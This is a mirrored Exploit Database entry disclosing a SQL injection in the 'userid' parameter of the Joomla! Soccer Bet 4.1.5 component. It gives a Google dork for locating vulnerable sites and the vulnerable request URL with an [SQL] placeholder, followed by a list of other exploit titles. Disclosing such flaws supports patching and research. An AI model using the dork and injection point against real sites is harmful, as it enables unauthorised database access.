Joomla! Component Soccer Bet 4.1.5 – ‘userid’ SQL Injection

Exploit Database
13 阅读

作者： Ihsan Sencan

日期： 2017-02-12
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/41328/

# # # # # 
# Exploit Title: Joomla! Component Soccer Bet 4.1.5 - 'userid' Parameter SQL Injection
# Google Dork: inurl:index.php?option=com_soccerbet
# Date: 12.02.2017
# Vendor Homepage: http://www.jomsoccerbet.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/sports-a-games/tips-a-betts/soccer-bet/
# Demo: http://demo.jomsoccerbet.com/
# Version: 4.1.5
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_soccerbet&view=userbethistory&userid=[SQL]
# # # # #

last Exploits
Joomla! Component Soccer Bet 4.1.5 – ‘userid’ SQL Injection的更多信息

PsNews 1.3 – SQL Injection：
DeWorkshop 1.0 – SQL Injection：
Gym Management System 1.0 – Stored Cross Site Scripting：
SofaWiki 3.9.2 – Remote Command Execution (RCE) (Authenticated)：
QualDev eCommerce script – SQL Injection：
Joomla! Component com_ckforms – Multiple Vulnerabilities：
ManagEnegine ADManager Plus 6.5.40 – Multiple Vulnerabilities：
WordPress Plugin WP Advanced Comment 0.10 – Persistent Cross-Site Scripting：